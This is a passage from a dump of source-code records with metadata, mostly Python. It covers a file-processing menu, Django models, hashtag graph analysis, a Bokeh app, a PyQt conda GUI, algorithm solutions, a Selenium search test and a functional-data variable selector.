print(\"==========================================================\")\n    print(\"1. Process a single file by name\")\n    print(\"2. Process every file in the directory\")\n    print(\"==========================================================\")\n    command = input(\"Enter your choice, 1 or 2: \")\n    if command == '1':\n        if files == []:\n            print(\"The directory is empty; please add the files to process\")\n            time.sleep(3)\n        else:\n            file = input(\"Enter the name of the file to process: {} : \".format(files))\n            deal(path + file)\n    elif command == '2':\n        if files == []:\n            print(\"The directory is empty; please add the files to process\")\n            time.sleep(3)\n        else:\n            read_all_file()\n    else:\n        print(\"Please enter a valid choice\")\n\n\n\n'''\nProcess every file in the directory\n'''\ndef read_all_file():\n    path = \"files/\"\n    files = os.listdir(path)\n    for file in files:\n        deal(path + file)\n\n\ndef main():\n    start_time = datetime.datetime.now()\n    readme()\n    end_time = datetime.datetime.now()\n    print('All job run %0.2f s' % (end_time - start_time).total_seconds())\nif __name__ == '__main__':\n    main()\n","sub_path":"get-file-max-avg/get_scripts.py","file_name":"get_scripts.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"333477327","text":"from django.db import models\n\n\nclass Level(models.Model):\n    name = models.CharField(max_length=150)\n    fill_priority = models.IntegerField()\n    motorcycle_spaces = models.IntegerField()\n    car_spaces = models.IntegerField()\n\n    @classmethod\n    def get_available_level_by_priority(cls, vehicle_type):\n        all_levels = cls.objects.all().order_by('fill_priority')\n\n        chosen_level = None\n        for level in all_levels:\n            level_capacity = level.car_spaces if vehicle_type == 'car' else level.motorcycle_spaces\n\n            if level.level_spaces.filter(\n                    variety=vehicle_type).count() < level_capacity:\n                chosen_level = level\n                break\n\n        return chosen_level\n\n\nclass LevelSpace(models.Model):\n    variety = models.CharField(max_length=150)\n    level_name = models.CharField(max_length=150)\n\n    level = models.ForeignKey(Level,\n                              related_name='level_spaces',\n                              on_delete=models.CASCADE)\n","sub_path":"levels/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"286379243","text":"from collections import defaultdict\nimport xlrd\nimport re\nimport math\n\nimport community\nimport networkx as nx\n\nimport matplotlib.pyplot as plt\n\nimport DataReading as DR\n\nimport HITSModule as HITS\n\nimport IgsTgsAnalysis as IgsTgs\n\nimport pip\n\nimport time\nimport TgsGraphAnalysis as TgsGrph\n\n\ndef main():\n\n\n    #region confirm title group\n    # title_list=read_title_list_from_excel('Data/Try_Function.xlsx')\n    # list_tgs_certain_group=['tag1','tag2','tag3']\n    #\n    title_list=read_title_list_from_excel('Data/Experiment_Resutls_170516/photo_list_July_without_Ads_Title.xlsx')\n\n    list_tgs_certain_group=read_tag_list_from_excel('Data/Experiment_Resutls_170516/food_tags_without_Ads.xlsx')\n    #\n    list_flags_title_certain_grp=IgsTgs.Confirm_Title_Group(title_list,list_tgs_certain_group)\n\n    write_list_flags_title_grp_2_excel(list_flags_title_certain_grp,'Data/Experiment_Resutls_170516/title_grp.txt')\n\n    #endregion\n\n    # G = HITS.create_user_checkingroup_graph('Data/Sample/user_checkin_group_sample.xlsx')\n    # HITS.myHITS(G, 1, 'Data/Sample/cluster_poi_count_sample.xlsx')\n    # AnalysisGraphFromTitle()\n\n    print()\n\n\n\n\ndef AnalysisGraphFromTitle():\n\n    start=time.clock()\n\n    # region Construct empty matrix and list to store the information of tag co-occurrence\n    
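# Overall flow: read the photo titles, build the tag vocabulary, count tag\n    # frequencies and pairwise co-occurrences, then run community detection on\n    # the resulting tag graph (see the region blocks below).\n    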
title_list=DR.read_title_list_from_excel('Data/Experiment_Resutls_May16/photo_list_July_without_Ads_Title.xlsx')\n    # title_list=read_title_list_from_excel('Data/sub_photo_list_July_Title.xlsx')\n\n    # list_stdrd_tags= IgsTgs.generate_stdrd_tgs_list(title_list) # a standard list that contains all tags found in the titles\n    # list_stdrd_tags = ['Craftsmanship', 'handmade', 'learningnewstuffeveryday', 'islandtang']\n\n    list_stdrd_tags =DR.read_small_sample_tgs('Data/Experiment_Resutls_May16/Saved_Tgs_Info_SortedBy_frequency_July_without_Ads_Small_Sample_30.xlsx') # Use a small sample of tags to calculate the adjacency so that the results can be visualized in Gephi\n\n    # tgs_matrix= IgsTgs.generate_empty_tg_matrix(list_stdrd_tags) # Generate empty tgs matrix; commented out because the matrix would be too large\n\n    list_tgs_frqc= IgsTgs.gnrt_empty_tgs_frqc_list(list_stdrd_tags) # Generate an empty list to store the frequency of each tag\n    # endregion\n\n    tg_adjacency_list=IgsTgs.generate_empty_tg_adjacency_list(list_stdrd_tags)\n\n    #region remove some dominant and meaningless tags in list_stdrd_tags\n    # list_stdrd_tags.remove('hkig')\n    # list_stdrd_tags.remove('HKIG')\n    # list_stdrd_tags.remove('HongKong')\n    # list_stdrd_tags.remove('hongkong')\n    # list_stdrd_tags.remove('hk')\n    # list_stdrd_tags.remove('HK')\n    #\n    # list_stdrd_tags.remove('tst')\n    # list_stdrd_tags.remove('causewaybay')\n    # list_stdrd_tags.remove('wanchai')\n    #\n    # list_stdrd_tags.remove('hkboy')\n    # list_stdrd_tags.remove('hkgirl')\n    # list_stdrd_tags.remove('hkgirls')\n    # list_stdrd_tags.remove('hkiger')\n    #\n    # list_stdrd_tags.remove('instagood')\n    # list_stdrd_tags.remove('igers')\n    # list_stdrd_tags.remove('ighk')\n    # list_stdrd_tags.remove('hkigers')\n    # list_stdrd_tags.remove('iger')\n    # list_stdrd_tags.remove('photooftheday')\n    # list_stdrd_tags.remove('picoftheday')\n    # list_stdrd_tags.remove('instamood')\n    # list_stdrd_tags.remove('igdaily')\n    # list_stdrd_tags.remove('instalike')\n    #endregion\n\n    # list_stdrd_tags=['Craftsmanship','handmade','learningnewstuffeveryday','islandtang']\n\n    # region Update tgs matrix and tgs frequency list\n    for each_lst_tags_title in title_list:\n        list_tags_from_oen_title=IgsTgs.get_tg_list_from_one_title(each_lst_tags_title[0])\n        # IgsTgs.update_tg_mtrx(list_tags_from_oen_title,list_stdrd_tags,tgs_matrix) # Update tgs matrix; commented out because the matrix would be too large\n        IgsTgs.update_tgs_frqc(list_tags_from_oen_title,list_stdrd_tags, list_tgs_frqc) # Update the tag frequency list\n        IgsTgs.updata_tg_adjacency_list(list_tags_from_oen_title,list_stdrd_tags,tg_adjacency_list)\n    # endregion\n\n    # region Write the tag co-occurrence matrix into an xls file\n    # write_matrix_into_xls(list_stdrd_tags,tgs_matrix)\n    # endregion\n\n    # region Write each tag's name and its count into the txt file\n    list_tgs_with_frqc = IgsTgs.extend_tgs_info_list(list_stdrd_tags,list_tgs_frqc) # Add frequency to the tags\n\n    list_tgs_with_frqc = IgsTgs.remove_tgs_occure_once(list_tgs_with_frqc)\n\n    # write_tgs_info_into_txt(list_tgs_with_frqc,'Saved_Tgs_Info_Standard_Order.txt') # Write tag counts in standard order\n    # endregion\n\n    # region Do community detection and write the partition result into a txt file\n    # G=TgsGrph.cnstrct_graph_from_2d_list(tgs_matrix)\n    # partition=TgsGrph.graph_partition(G)\n    G2=TgsGrph.cnstrct_graph_from_tg_adjacency_list(tg_adjacency_list)\n    partition2=TgsGrph.graph_partition(G2)\n\n    list_tgs_frqc_partition=IgsTgs.extend_tgs_info_list(list_tgs_with_frqc,partition2) #Add the partition to 
the tags with frequency\n    elapsed=(time.clock()-start)\n    print(\"Time used:\", elapsed)\n\n    # TgsGrph.graph_partition_drawing(partition,G)\n    # write_patition_info_into_txt(partition,'Saved_Tgs_Partition_Standard_Order.txt')\n    #endregion\n\n    DR.write_tgs_adjacency_list(list_stdrd_tags, tg_adjacency_list) # Write the adjacency list\n    print()\n\ndef construct_empty_tg_matrix(title_list,tgs_matrix1,list_stdrd1):\n\n\n    _list_tags_from_titles = [] # list of tags without the sharp symbol\n    for title in title_list:\n        _tags_with_sharp_in_one_title=set(re.findall('#\\w+(?=\\s)|#\\w+(?=#)|#\\w+(?=$)', str(title[0]))) # convert the matches to a set first, removing tags repeated within a single post\n        # Use three regular expressions to extract the tags in the title; take the title '#VSCOcam haeco in the#dark#Audi #A6' for example\n        # '#\\w+\\s' extracts tags starting with '#' followed by a space (the expression does not extract the space), e.g. '#VSCOcam' '#Audi'\n        # '#\\w+(?=#)' extracts tags starting with '#' followed by another '#' (the expression does not extract the #), e.g. '#Audi'\n        # '#\\w+(?=$)' extracts tags starting with '#' followed by the end of the whole string\n        for tag_with_sharp in _tags_with_sharp_in_one_title:\n            _list_tags_from_titles.append(tag_with_sharp[1:]) # list containing tags without the sharp; it may contain duplicates because different titles can share tags\n\n\n    list_stdrd1.extend(list(set(_list_tags_from_titles))) # extend() mutates the caller's list in place, so list_stdrd1 keeps pointing at the argument object\n    list_stdrd1.sort() # sorted list of all tags in the titles without duplicates; it can be used as the list that defines the standard order of tags\n\n\n    # when constructing the matrix, we should use the tag list without duplicate tags\n    _n_tgs_conut=len(list_stdrd1)\n    tgs_matrix1.extend([[0 for i in range(_n_tgs_conut)] for i in range(_n_tgs_conut)])\n\n\n\n\n    print()\n\ndef read_title_list_from_excel(str_excel_location):\n\n    Title_data=xlrd.open_workbook(str_excel_location)\n    Table=Title_data.sheets()[0]\n    title_list=Table._cell_values[1:] # everything except the header row is data\n\n    return title_list\n\ndef write_list_flags_title_grp_2_excel(list_flags_title_certain_grp,txt_name):\n\n    with open(txt_name,\"w\") as text_file:\n        for i in range(0, len(list_flags_title_certain_grp)):\n            text_file.write('%s'% (str(list_flags_title_certain_grp[i])))\n            text_file.write('\\n')\n\ndef read_tag_list_from_excel(str_excel_location):\n\n    Excel_data = xlrd.open_workbook(str_excel_location)\n    Table=Excel_data.sheets()[0]\n    tag_list=list()\n    for i in range(len(Table._cell_values)):\n        tag_list.extend(Table._cell_values[i])\n\n    return tag_list\n\ndef update_tg_mtrx(each_lst_tags_title, tags_matrix1, list_stdrd1):\n    \"\"\"\n    Read each list that contains the tags of one title, and update the tag matrix.\n    Because the data volume is large, the matrix is updated as each tag list is analyzed,\n    rather than computed at once from all the tag lists.\n    :param each_lst_tags_title: the list that contains the tags of one title.\n    :param tags_matrix1: the input tag matrix; Python passes the same object, so tags_matrix1 is updated in place\n    :param list_stdrd1: the list that contains the standard order of tags, used for determining the meaning of the matrix indices\n    :return:\n    \"\"\"\n\n\n    for start_item_in_title in each_lst_tags_title:\n        strt_item_idx_in_tgs_title=each_lst_tags_title.index(start_item_in_title)\n        strt_item_idx_in_matrix=list_stdrd1.index(start_item_in_title)\n        for i in 
range(strt_item_idx_in_tgs_title+1,len(each_lst_tags_title)):\n crt_item_idx_in_matrix=list_stdrd1.index(each_lst_tags_title[i])\n tags_matrix1[strt_item_idx_in_matrix][crt_item_idx_in_matrix]+=1\n tags_matrix1[crt_item_idx_in_matrix][strt_item_idx_in_matrix]+=1\n\ndef graph_partition_drawing(G):\n # first compute the best partition\n partition = community.best_partition(G)\n # drawing\n size = float(len(set(partition.values())))\n pos = nx.spring_layout(G)\n count = 0.\n for com in set(partition.values()):\n count = count + 1.\n list_nodes = [nodes for nodes in partition.keys()\n if partition[nodes] == com]\n nx.draw_networkx_nodes(G, pos, list_nodes, node_size=20,\n node_color=str(count / size))\n\n nx.draw_networkx_edges(G, pos, alpha=0.5)\n plt.show()\n\n\nmain()","sub_path":"TryFunction.py","file_name":"TryFunction.py","file_ext":"py","file_size_in_byte":9662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"516406390","text":"# -*- coding: utf-8 -*- \nimport sys\nimport pandas as pd\nfrom chrysalids.model import mutant_app\nfrom chrysalids.wildtype import induction_app\nfrom chrysalids.dna_muts import dna_app\nimport bokeh.io\nimport bokeh.plotting\nfrom bokeh.models import ColumnDataSource, Div\nfrom bokeh.layouts import layout, widgetbox\nfrom bokeh.models.widgets import Select, Slider, RadioButtonGroup\nimport bokeh.themes\nimport glob\nimport mut.viz\ncolors = mut.viz.color_selector('pboc')\n\n# ###########################\n# DATA LOADING\n# ############################\nind_data = pd.read_csv('mwc_mutants/data/csv/RazoMejia2018_data.csv')\nind_data['repressors'] *= 2\nind_data.rename(columns={'fold_change_A':'fold_change',\n 'IPTG_uM':'IPTGuM'}, inplace=True)\nind_data = ind_data[ind_data['repressors'] > 0 ].copy()\n\n# ###########################\n# MUTANT DATA PRUNING\n# ##########################\nmut_data = pd.read_csv('mwc_mutants/data/csv/compiled_data.csv')\ndbohr_stats = pd.read_csv('mwc_mutants/data/csv/empirical_F_statistics.csv')\nepRA_stats = pd.read_csv('mwc_mutants/data/csv/DNA_binding_energy_summary.csv')\nDNA_data = mut_data[((mut_data['class']=='WT') | (mut_data['class']=='DNA')) & \n (mut_data['operator']=='O2')]\nDNA_stats = dbohr_stats[dbohr_stats['class']=='DNA'].copy()\n\n# #############################\n# THEME DETAILS\n# ############################\ntheme_json = {'attrs':\n {'Figure': {\n 'background_fill_color': '#E3DCD0',\n 'outline_line_color': '#FFFFFF',\n },\n 'Axis': {\n 'axis_line_color': \"white\",\n 'major_tick_in': 7,\n 'major_tick_line_width': 2.5,\n 'major_tick_line_color': \"white\",\n 'minor_tick_line_color': \"white\",\n 'minor_tick_line_color': \"white\",\n 'axis_label_text_font': 'Lucida Sans',\n 'axis_label_text_font_style': 'normal'\n },\n 'Grid': {\n 'grid_line_color': None,\n },\n 'Text': {\n 'text_font_style': 'normal',\n 'text_font': 'Lucida Sans'\n },\n 'Title': {\n 'background_fill_color': '#FFEDC0',\n 'text_font_style': 'normal',\n 'align': 'center',\n 'text_font': 'Lucida Sans',\n 'offset': 2,\n }}}\n\nprint(epRA_stats.head())\ntheme = bokeh.themes.Theme(json=theme_json)\ntab1 = mutant_app()\ntab2 = induction_app(ind_data)\ntab3 = dna_app(DNA_data, DNA_stats, epRA_stats)\ntabs = bokeh.models.widgets.Tabs(tabs=[tab1, tab2, tab3])\nbokeh.io.curdoc().theme = theme\nbokeh.io.curdoc().add_root(tabs)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} 
+{"seq_id":"7293248","text":"# -*- coding: utf-8 -*-\n\"\"\"\nGraphical user interface to the conda package manager\n\"\"\"\n\nfrom PyQt5 import QtCore, QtWidgets\n\nfrom .conda import Environment\nfrom .controller import CondaController, base_environment\nfrom .qbusyindicator import QBusyIndicator\n\n\nclass CondaGUI(QtWidgets.QMainWindow):\n\n # Emit this whenever we want to know all available environments\n request_updated_available_environments = QtCore.pyqtSignal()\n\n # Emit this signal when we choose a new active environment\n change_active_environment = QtCore.pyqtSignal(Environment)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Object responsible for interactions with conda. This will take place in another thread.\n self._controller_thread = QtCore.QThread(parent = self)\n self.controller = CondaController()\n self.controller.moveToThread(self._controller_thread)\n self._controller_thread.start()\n\n # Connect controller signals\n self.controller.environment_changed.connect(self.update_active_environment)\n self.change_active_environment.connect(self.controller.change_active_environment)\n\n # Status bar goes at the bottom of the window\n # Most importantly used for a 'busy' indicator\n status_bar = QtWidgets.QStatusBar(parent = self)\n self.setStatusBar(status_bar)\n\n busy_indicator = QBusyIndicator(parent = self)\n self.controller.operation_in_progress.connect(busy_indicator.toggle_animation)\n status_bar.addPermanentWidget(busy_indicator)\n\n # Active environment information\n self.name_label = QtWidgets.QLabel('--')\n self.path_label = QtWidgets.QLabel('--')\n for label in (self.name_label, self.path_label):\n label.setAlignment(QtCore.Qt.AlignHCenter)\n\n # Layout displaying basic information about the current active environment\n info_layout = QtWidgets.QFormLayout()\n info_layout.addRow('Environment name: ', self.name_label)\n info_layout.addRow('Environment path: ', self.path_label)\n\n # Get packages list by clicking a button\n update_packages_list_btn = QtWidgets.QPushButton('Update packages list')\n update_packages_list_btn.clicked.connect(self.controller.update_packages_list)\n update_packages_list_btn.setSizePolicy(\n QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum\n )\n\n # Displaying the packages list is taken care of by a custom widget\n self.packages_list_widget = PackagesListWidget()\n self.controller.packages_list.connect(self.packages_list_widget.set_packages_list)\n\n # Layout related to the active environment\n environment_layout = QtWidgets.QVBoxLayout()\n environment_layout.addLayout(info_layout)\n environment_layout.addWidget(self.packages_list_widget)\n environment_layout.addWidget(update_packages_list_btn)\n\n # Place all widgets related to the current environment in their own QFrame widget\n # This way, we can distinguish those widgets from general widgets\n environment_frame = QtWidgets.QFrame()\n environment_frame.setLayout(environment_layout)\n environment_frame.setFrameShadow(QtWidgets.QFrame.Sunken)\n environment_frame.setFrameShape(QtWidgets.QFrame.Panel)\n \n # Overall layout\n layout = QtWidgets.QVBoxLayout()\n layout.addWidget(environment_frame)\n\n # A central widget is needed to layout other widgets\n self.central_widget = QtWidgets.QWidget(parent = self)\n self.central_widget.setLayout(layout)\n self.setCentralWidget(self.central_widget)\n\n # The window must also be shown, otherwise nothing happens\n self.setWindowTitle('CondaGUI')\n self.show()\n\n # initial update\n 
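# These queued signal emissions deliver the work to the controller on its own\n        # thread (created above via moveToThread), so conda operations never block\n        # the GUI thread.\n        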
self.request_updated_available_environments.emit()\n self.change_active_environment.emit(base_environment())\n\n def closeEvent(self, event):\n \"\"\" This event is triggered when the user closes the window. \"\"\"\n self._controller_thread.quit()\n super().closeEvent(event)\n \n @QtCore.pyqtSlot(Environment)\n def update_active_environment(self, env):\n \"\"\" Update main window due to a change in active environment \"\"\"\n self.name_label.setText(env.name)\n self.path_label.setText(env.path)\n self.packages_list_widget.clear()\n\nclass PackagesListWidget(QtWidgets.QTableWidget):\n \"\"\" \n Customized widget to display list of `Package` instances.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.verticalHeader().hide()\n self.setEditTriggers(\n QtWidgets.QAbstractItemView.NoEditTriggers\n ) #no edit triggers, see QAbstractItemViews\n\n @QtCore.pyqtSlot(set)\n def set_packages_list(self, packages):\n \"\"\" Update the packages list widget based on a list of packages \"\"\"\n packages = sorted(packages, key = lambda p: p.name)\n self.clear()\n\n # Special case : empty environments\n if len(packages) == 0:\n self.setRowCount(1)\n self.setColumnCount(1)\n item = QtWidgets.QTableWidgetItem('No packages installed in this environment')\n self.setItem(0, 0, item)\n return\n\n # If list of environments is not empty, we proceed with listing them\n self.setRowCount(len(packages))\n self.setColumnCount(3)\n self.setHorizontalHeaderLabels(['Package', 'Version', 'Channel'])\n for row, package in enumerate(packages):\n self.setItem(row, 0, QtWidgets.QTableWidgetItem(package.name))\n self.setItem(row, 1, QtWidgets.QTableWidgetItem(package.version))\n self.setItem(row, 2, QtWidgets.QTableWidgetItem(package.channel))\n\n self.horizontalHeader().setStretchLastSection(True)\n","sub_path":"condagui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"477490706","text":"import bisect\n\n\ndef calc(l, r):\n index_small = bisect.bisect_left(a, l)\n index_large = bisect.bisect_right(a, r)\n num = index_large - index_small\n if num == 0:\n ans = A\n else:\n ans = B * (r - l + 1) * num\n if l != r and num != 0:\n mid = (l+r-1)/2\n ans = min(ans, calc(l, mid) + calc(mid+1, r))\n return ans\n\n\n[n, k, A, B] = list(map(int, input().split()))\nglobal a\na = list(map(int, input().split()))\na.sort()\nr = 1 << n\nprint(int(calc(1, r)))\n","sub_path":"Codeforces/contest/1111/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"646562155","text":"class Solution:\n \"\"\"\n @param: : A list of integers\n @return: A list of unique permutations\n \"\"\"\n def permuteUnique(self, nums):\n if nums is None or len(nums) == 0:\n return []\n result = []\n nums.sort()\n self.dfs(nums, [], result, [False for _ in range(len(nums))])\n return result\n \n def dfs(self, nums, subset, result, visited):\n if len(nums) == len(subset):\n # result.append(copy.deepcopy(subset)) # python2\n result.append(subset.copy()) # python3\n return\n \n for i in range(len(nums)):\n if visited[i] or i != 0 and nums[i] == nums[i-1] and not visited[i-1]:\n # illegal visit will occur\n continue\n visited[i] = True\n subset.append(nums[i])\n self.dfs(nums, subset, result, visited)\n visited[i] = False\n 
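# backtrack: remove the element so the next candidate can occupy this slot\n            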
subset.pop()\n","sub_path":"Python/lintcode_python/16_permutation_ii.py","file_name":"16_permutation_ii.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"462632597","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 23 21:30:58 2020\r\n\r\n@author: user\r\n\"\"\"\r\n\r\nimport face_recognition as fr\r\nimport cv2\r\n\r\nimage = cv2.imread('football1.jpg')\r\nface_locations = fr.face_locations(image, number_of_times_to_upsample=2)\r\n\r\nfor face_location in face_locations:\r\n\r\n    # unpack the position where a face was detected in the image\r\n    top, right, bottom, left = face_location\r\n\r\n    # draw a rectangle around the face\r\n    cv2.rectangle(image,(left,top),(right,bottom),(255,0,0),2)\r\n\r\n# show the result on screen\r\ncv2.imshow('image',image)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"12주/KOCW_12주_3.py","file_name":"KOCW_12주_3.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"123587486","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport unittest\nimport HtmlTestRunner\n\n\nclass GoogleSearch(unittest.TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n\n        cls.setPath = 'Chrome'\n        if cls.setPath == 'Chrome':\n            cls.driver = webdriver.Chrome()\n        else:\n            cls.driver = webdriver.Ie()\n        # Search in google\n        cls.driver.set_page_load_timeout(10)\n        cls.driver.maximize_window()\n\n    def test_search_automation(self):\n        # Access to google\n        self.driver.get(\"http://google.com\")\n        # Find the search box by its name attribute\n        que = self.driver.find_element_by_name(\"q\")\n        que.send_keys(\"Automation step by step\")\n        time.sleep(2)\n        # Click button\n        que.send_keys(Keys.ARROW_DOWN)\n        que.send_keys(Keys.ENTER)\n\n    @classmethod\n    def tearDownClass(cls):\n        cls.driver.maximize_window()\n        cls.driver.refresh()\n        time.sleep(5)\n        cls.driver.quit()\n\n\nif __name__ == '__main__':\n    unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(\n        output='D:/DATA\\Electronic/Electronic Study/Python/Selenium/2.Unit_Test'))\n","sub_path":"Selenium/2.Unit_Test/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"275192450","text":"import dcor\n\nimport scipy.signal\nimport sklearn.base\nimport sklearn.utils\n\nimport numpy as np\n\nfrom ....representation import FDataGrid\n\n\ndef _compute_dependence(X, y, *, dependence_measure):\n    '''\n    Computes the dependence of each point in each trajectory in X with the\n    corresponding class label in Y.\n    '''\n\n    # Move n_samples to the end\n    # The shape is now input_shape + n_samples + n_output\n    X = np.moveaxis(X, 0, -2)\n\n    input_shape = X.shape[:-2]\n\n    # Join input in a list for rowwise\n    X = X.reshape(-1, X.shape[-2], X.shape[-1])\n\n    if y.ndim == 1:\n        y = np.atleast_2d(y).T\n    Y = np.array([y] * len(X))\n\n    dependence_results = dcor.rowwise(dependence_measure, X, Y)\n\n    return dependence_results.reshape(input_shape)\n\n\ndef select_local_maxima(X, *, order: int=1):\n    r'''\n    Compute local maxima of an array.\n\n    Points near the boundary are considered maxima looking only at one side.\n\n    For flat regions only the boundary points of the flat region could be\n    considered maxima.\n\n    Parameters:\n\n        X (numpy array): Where to compute the local maxima.\n        order (int): How many points on each side to look, to check if\n            a point is a maximum in that interval.\n\n    
Examples:\n\n    >>> from skfda.preprocessing.dim_reduction.variable_selection.\\\n    ...     maxima_hunting import select_local_maxima\n    >>> import numpy as np\n\n    >>> x = np.array([2, 1, 1, 1, 2, 3, 3, 3, 2, 3, 4, 3, 2])\n    >>> select_local_maxima(x).astype(np.int_)\n    array([ 0, 5, 7, 10])\n\n    The ``order`` parameter can be used to check a larger interval to see\n    if a point is still a maximum, effectively eliminating small local\n    maxima.\n\n    >>> x = np.array([2, 1, 1, 1, 2, 3, 3, 3, 2, 3, 4, 3, 2])\n    >>> select_local_maxima(x, order=3).astype(np.int_)\n    array([ 0, 5, 10])\n\n    '''\n    indexes = scipy.signal.argrelextrema(\n        X, comparator=np.greater_equal, order=order)[0]\n\n    # Discard flat\n    maxima = X[indexes]\n\n    left_points = np.take(X, indexes - 1, mode='clip')\n    right_points = np.take(X, indexes + 1, mode='clip')\n\n    is_not_flat = (maxima > left_points) | (maxima > right_points)\n\n    return indexes[is_not_flat]\n\n\nclass MaximaHunting(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):\n    r'''\n    Maxima Hunting variable selection.\n\n    This is a filter variable selection method for problems with a target\n    variable. It evaluates a dependence measure between each point of the\n    function and the target variable, and keeps those points in which this\n    dependence is a local maximum.\n\n    Selecting the local maxima serves two purposes. First, it ensures that\n    the points that are relevant in isolation are selected, as they must\n    maximize their dependence with the target variable. Second, the points\n    that are relevant only because they are near a relevant point (and are\n    thus highly correlated with it) are NOT selected, as only local maxima\n    are selected, minimizing the redundancy of the selected variables.\n\n    For a longer explanation about the method, and comparison with other\n    functional variable selection methods, we refer the reader to the\n    original article [1]_.\n\n    Parameters:\n\n        dependence_measure (callable): Dependence measure to use. By default,\n            it uses the bias corrected squared distance correlation.\n        local_maxima_selector (callable): Function to detect local maxima. The\n            default is :func:`select_local_maxima` with ``order`` parameter\n            equal to one. The original article used a similar function testing\n            different values of ``order``.\n\n    Examples:\n\n        >>> from skfda.preprocessing.dim_reduction import variable_selection\n        >>> from skfda.preprocessing.dim_reduction.variable_selection.\\\n        ...     maxima_hunting import select_local_maxima\n        >>> from skfda.datasets import make_gaussian_process\n        >>> from functools import partial\n        >>> import skfda\n        >>> import numpy as np\n\n        We create trajectories from two classes, one with zero mean and the\n        other with a peak-like mean. Both have Brownian covariance.\n\n        >>> n_samples = 10000\n        >>> n_features = 100\n        >>>\n        >>> def mean_1(t):\n        ...     return (np.abs(t - 0.25)\n        ...             - 2 * np.abs(t - 0.5)\n        ...             + np.abs(t - 0.75))\n        >>>\n        >>> X_0 = make_gaussian_process(n_samples=n_samples // 2,\n        ...                             n_features=n_features,\n        ...                             random_state=0)\n        >>> X_1 = make_gaussian_process(n_samples=n_samples // 2,\n        ...                             n_features=n_features,\n        ...                             mean=mean_1,\n        ...                             random_state=1)\n        >>> X = skfda.concatenate((X_0, X_1))\n        >>>\n        >>> y = np.zeros(n_samples)\n        >>> y[n_samples // 2:] = 1\n\n        Select the relevant points to distinguish the two classes\n\n        >>> local_maxima_selector = partial(select_local_maxima, order=10)\n        >>> mh = variable_selection.MaximaHunting(\n        ...         
local_maxima_selector=local_maxima_selector)\n        >>> _ = mh.fit(X, y)\n        >>> point_mask = mh.get_support()\n        >>> points = X.grid_points[0][point_mask]\n        >>> np.allclose(points, [0.5], rtol=0.1)\n        True\n\n        Apply the learned dimensionality reduction\n\n        >>> X_dimred = mh.transform(X)\n        >>> len(X.grid_points[0])\n        100\n        >>> X_dimred.shape\n        (10000, 1)\n\n    References:\n\n        .. [1] J. R. Berrendero, A. Cuevas, and J. L. Torrecilla, “Variable\n            selection in functional data classification: a maxima-hunting\n            proposal,” STAT SINICA, vol. 26, no. 2, pp. 619–638, 2016,\n            doi: 10.5705/ss.202014.0014.\n\n    '''\n\n    def __init__(self,\n                 dependence_measure=dcor.u_distance_correlation_sqr,\n                 local_maxima_selector=select_local_maxima):\n        self.dependence_measure = dependence_measure\n        self.local_maxima_selector = local_maxima_selector\n\n    def fit(self, X: FDataGrid, y):\n\n        self.features_shape_ = X.data_matrix.shape[1:]\n        self.dependence_ = _compute_dependence(\n            X.data_matrix, y,\n            dependence_measure=self.dependence_measure)\n\n        self.indexes_ = self.local_maxima_selector(self.dependence_)\n\n        sorting_indexes = np.argsort(self.dependence_[self.indexes_])[::-1]\n        self.sorted_indexes_ = self.indexes_[sorting_indexes]\n\n        return self\n\n    def get_support(self, indices: bool=False):\n        if indices:\n            return self.indexes_\n        else:\n            mask = np.zeros(self.features_shape_[0:-1], dtype=bool)\n            mask[self.indexes_] = True\n            return mask\n\n    def transform(self, X, y=None):\n\n        sklearn.utils.validation.check_is_fitted(self)\n\n        if X.data_matrix.shape[1:] != self.features_shape_:\n            raise ValueError(\"The trajectories have a different number of \"\n                             \"points than the ones fitted\")\n\n        return X.data_matrix[:, self.sorted_indexes_].reshape(X.n_samples, -1)\n","sub_path":"skfda/preprocessing/dim_reduction/variable_selection/maxima_hunting.py","file_name":"maxima_hunting.py","file_ext":"py","file_size_in_byte":7292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"33060188","text":"import math\n\nprint(abs(-20))\nprint(max(2, 3, 1, -5))\n\n# data type convert\nprint(int('123'))\nprint(int(12.34))\nprint(float('12.34'))\nprint(str(1.23))\nprint(bool(1))\nprint(bool(''))\nprint(hex(255))\nprint(hex(1000))\n\n\n# function definition isinstance(): data type check\ndef my_abs(x):\n    if not isinstance(x, (int, float)):\n        raise TypeError('bad operand type')\n    if x >= 0:\n        return x\n    else:\n        return -x\n\nprint(my_abs(-99))\n\n\n# null function\ndef nop():\n    pass\n\n\n# return more than one value\ndef move(x, y, step, angle=0):\n    nx = x + step * math.cos(angle)\n    ny = y - step * math.sin(angle)\n    return nx, ny\n\nprint(move(1, 1, 10, math.pi / 